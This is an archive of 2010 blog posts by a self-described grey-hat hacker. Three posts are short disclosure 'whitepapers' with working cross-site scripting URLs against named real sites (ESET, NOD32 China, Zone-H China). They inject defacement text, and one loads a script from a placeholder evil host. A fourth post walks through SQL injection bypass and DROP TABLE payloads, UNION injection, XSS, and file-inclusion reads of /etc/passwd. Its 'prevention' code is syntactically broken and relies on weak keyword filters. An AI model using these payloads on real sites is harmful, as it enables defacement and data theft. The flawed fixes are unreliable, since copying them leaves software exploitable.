Archive for the Papers Category

[whitepaper] ESET Cross Site Scripting Exploit

Posted in Papers on January 4, 2010 by Sora

___________ _______________________________
\_   _____//   _____/\_   _____/\__    ___/
|    __)_ \_____  \  |    __)_   |    |
|        \/        \ |        \  |    |   http://www.eset.com/
|
/_______  /_______  //_______  /  |____|
\/        \/         \/   > Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/
> Vulnerability: Cross Site Scripting

————————-
1. INFORMATION          |
————————-
Site: http://search.eset.com/
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————-
2. DESCRIPTION          |
————————-

http;//search.eset.com/ suffers a remote cross site scripting exploit, which can be used to
scam information and to execute malicious javascript which might remotely download a file to the
victim’s PC.

————————-
3. PROOF OF CONCEPT     |
————————-
http://search.eset.com/esetsite/index?page=answers&type=%3Ciframe%20src=%22www.google.ca%22%3E&question_box=%3Ch2%3EHacked%20by%20Sora%20-%20vhr95zw%20%5Bat%5D%20hotmail%20%5Bdot%5D%20com%20-%20greyhathackers.blogspot.com%3C/h2%3E%3Ciframe%20src=%22www.xssed.com%22%3E&ichbox%5B%5D=en-US

Pretty much owned? >:D

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – https://greyhathackers.wordpress.com – Sora

Advertisements

[whitepaper] NOD32 (CN) Cross Site Scripting Vulnerability

Posted in Papers on January 4, 2010 by Sora

.___________  ________  http://www.nod32.com.cn
____   ____   __| _/\_____  \ \_____  \    ____   ____
/    \ /  _ \ / __ |   _(__  <  /  ____/   _/ ___\ /    \
|   |  (  <_> ) /_/ |  /       \/       \   \  \___|   |  \
|___|  /\____/\____ | /______  /\_______ \ / \___  >___|  /
\/            \/        \/         \/ \/   \/     \/
> Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com
> Vulnerability: Cross Site Scripting

————————-
1. INFORMATION          |
————————-
Site: http://www.nod32.com.cn
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————-
2. DESCRIPTION          |
————————-

http;//www.nod32.com.cn suffers a remote cross site scripting exploit, which can be used to
scam information and to execute malicious javascript which might remotely download a file to the
victim’s PC.

————————-
3. PROOF OF CONCEPT     |
————————-
Display a message using HTML:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=%3Ch1%3EXSS+-+Sora%3C%2Fh1%3E%3E%22%3Ctitle%3E%3Cmarquee%3EXSS%20by%20Sora%20-%20IMPROVE%20YOUR%20SECURITY%20-%20greyhathackers.wordpress.com&btnG=

Execute malicious code:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=<script src=”http://www.evilsite.com/foo.js”><h2>Error</h2>&btnG=

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – https://greyhathackers.wordpress.com – Sora

[whitepaper] Zone-H (CN) XSS Vulnerability

Posted in Papers on January 4, 2010 by Sora

.__
____________   ____   ____           |  |__               ____   ____
\___   /  _ \ /    \_/ __ \   ______ |  |  \    ______  _/ ___\ /    \
/    (  <_> )   |  \  ___/  /_____/ |   Y  \  /_____/  \  \___|   |  \
/_____ \____/|___|  /\___  >         |___|  /            \___  >___|  /
\/          \/     \/               \/                 \/     \/
> Cross Site Scripting Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/

————————
1. INFORMATION         |
————————
Site: http://www.zone-h.com.cn/
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————
2. DESCRIPTION         |
————————
http://www.zone-h.com.cn/ suffers from a cross site scripting vulnerability. This vulnerability can be exploited in many ways.
An example is creating a form to scam other people, or to execute malicious javascript code on the victim’s computer.

————————
3. PROOF OF CONCEPT    |
————————

HTML Code:
http://www.zone-h.com.cn/index.php?key=%3Ciframe+src%3D%22http%3A%2F%2Fwww.greyhathackers.wordpress.com%2F%22%3E%3Ch2%3E%3Ccenter%3EHacked+by+Sora+-+vhr95zw+%5Bat%5D+hotmail+%5Bdot%5D+com%3C%2Fcenter%3E%3C%2Fh2%3E&mode=user&Submit=+Search+

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – https://greyhathackers.wordpress.com – Sora

Blocking Common Web Attacks

Posted in Papers on January 3, 2010 by Sora

>——————————————————-<
_________
/   _____/ ________________   https://greyhathackers.wordpress.com/
\_____  \ /  _ \_  __ \__  \
/        (  <_> )  | \// __ \_
/_______  /\____/|__|  (____  / presents . . .
\/     ^-^          \/
>——————————————————-<

[ INFORMATION ]

Title: Blocking Common Web Attacks
Author: Sora
Contact: vhr95zw [at] hotmail [dot] com
Website: https://greyhathackers.wordpress.com/

[ END OF INFORMATION ]
>——————————————————-<

[ TABLE OF CONTENTS ]

0x00: Introduction
0x01: SQL Injection
\_ 0x01a: Login Form Bypassing
\_ 0x01b: UNION SQL Injection
0x02: Cross Site Scripting
\_ 0x02a: Cross Site Request Forgery
0x03: File Inclusion
\_ 0x03a: Remote File Inclusion and Remote Code Execution
0x04: Conclusion, credits, and greetz

[ TABLE OF CONTENTS END ]
>——————————————————-<

0x00: Introduction

This article will tell you about five types of common web attacks, which are used
in most types of defacements or dumps of databases. The five exploits
listed above are SQL injection, XSS, RCE, RFI, and LFI. Most of the time, it is
poor programming of the PHP code that allows the hacker to get through.

>——————————————————-<

0x01: SQL Injection

\_ 0x01a: LOGIN FORM BYPASSING

Here is an example of the vulnerable code that we can bypass very easily:

index.html file:
<form action=”login.php” method=”POST” />
<p>Password: <input type=”text” name=”pass” /><br />
<input type=”submit” value=”Authenticate” /></p>
</form>

login.php file:
<?php
// EXAMPLE CODE
$execute = “SELECT * from database WHERE password = ‘{$_POST[‘pass’])”;
$result = mysql_query($execute);
?>

We can simply bypass this by using ‘ or ‘1=1’, which will execute “password = ”or ‘1=1”;”.

Alternatively, the user can also delete the database by executing “‘ drop table database; –“.

[+] PREVENTION:

Use mysql_real_escape_string in your php code.

Example:
<?php
$badword = “‘ OR 1 ‘”;
$badword = mysql_real_escape_string($badword);
$message = “SELECT * from database WHERE password = “‘$badword'”;
echo “Blocked ” . $message . “;
?>

\_ 0x01b: UNION SQL Injection

UNION SQL injection is when the user uses the UNION command. The user checks for the vulnerability by
adding a tick to the end of a “.php?id=” file. If it comes back with a MySQL error, the site is most likely
vulnerable to UNION SQL injection. They proceed to use ORDER BY to find the columns, and at the end, they use
the UNION ALL SELECT command. An example is shown below.

http://www.site.com/website.php?id=1&#8242;
You have an error in your SQL syntax near ” at line 1 SELECT SUM(quantity) as type FROM orders where (status=’completed’ OR status=’confirmed’ OR status=’pending’) AND user_id=1′

http://www.site.com/website.php?id=1 ORDER BY 1– <– No error.
http://www.site.com/website.php?id=1 ORDER BY 2– <– Two columns, and it comes back with an error! This means that there is one column.
http://www.site.com/website.php?id=-1 UNION SELECT ALL version()– <– Selects the all the columns and executes the version() command on the only column.

[+] SOLUTION:

Add something like below to prevent UNION SQL injection.

$evil = “(delete)|(update)|(union)|(insert)|(drop)|(http)|(–)|(/*)|(select)”;
$patch = eregi_replace($evil, “”, $patch);

>——————————————————-<

0x02: Cross Site Scripting

Cross site scripting is a type of vulnerability used by hackers to inject code into vulnerable web pages.
If a site is vulnerable to cross site scripting, most likely users will try to inject the site with malicious javascript or try to
scam users by creating a form where users have to type their information in. Two types of XSS (cross site scripting) are persistent XSS
and non-persistent XSS.

Example:
http://www.site.com/search.php?q=”><script>alert(/XSS by Sora – vhr95zw at hotmail dot com – https://greyhathackers.wordpress.com/)</script>

[+] SOLUTION (javascript) (Thank you, Microsoft!):

function RemoveBad(strTemp) {
strTemp = strTemp.replace(/\<|\>|\”|\’|\%|\;|\(|\)|\&|\+|\-/g,””);
return strTemp;
}

>——————————————————-<

0x03: File Inclusion

\_ 0x03a: Remote File Inclusion/Local File Inclusion, and Remote Code Execution

Remote File Inclusion allows a hacker to include a remote file through a script (usually PHP). This code is mostly patched on websites, but some websites are still
vulnerable to the vulnerability. RFI usually leads to remote code execution or javascript execution.

Example of the vulnerable code:
<?php
include($_GET[‘page’]);
?>

Exploiting it would be something like this:
http://www.site.com/page.php?page=../../../../../etc/passwd or
http://www.site.com/page.php?page=http://www.site.com/evil.txt?

[+] SOLUTION:
Validate the input.
$page = $_GET[‘page’];
$allowed = array(‘index.php’, ‘games.php’ ‘ip.php’);
$iplogger = (‘ip.php’);
if (in_array $page, $pages)) {
include $page {
else
{
include $iplogger
die(“IP logged.”);
}

For remote code execution, the site would have to have a php executing command. You would patch this by about doing the same thing.

>——————————————————-<

0x04: Conclusion, credits, and greetz.

This pretty much sums up my tutorial about basic web protection. Hopefully your site isn’t vulnerable to these types of attacks!

Credits:
Microsoft (XSS patch)

Greetz:
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com
<c> 2010 – https://greyhathackers.wordpress.com – Sora